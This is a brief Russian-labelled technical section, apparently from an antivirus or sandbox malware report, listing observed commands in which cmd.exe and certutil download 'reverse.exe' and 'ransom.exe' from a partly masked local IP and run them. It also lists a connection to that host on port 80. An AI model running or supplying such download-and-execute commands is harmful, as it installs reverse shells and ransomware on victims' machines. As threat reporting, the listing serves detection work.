Техническая информация
- '<SYSTEM32>\cmd.exe' /k certutil -urlcache -split -f http://19#.#68.10.131/reverse.exe && reverse.exe
- '<SYSTEM32>\cmd.exe' /k certutil -urlcache -split -f http://19#.#68.10.131/ransom.exe && ransom.exe
- '<LOCALNET>.10.131':80
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://19#.#68.10.131/reverse.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://19#.#68.10.131/ransom.exe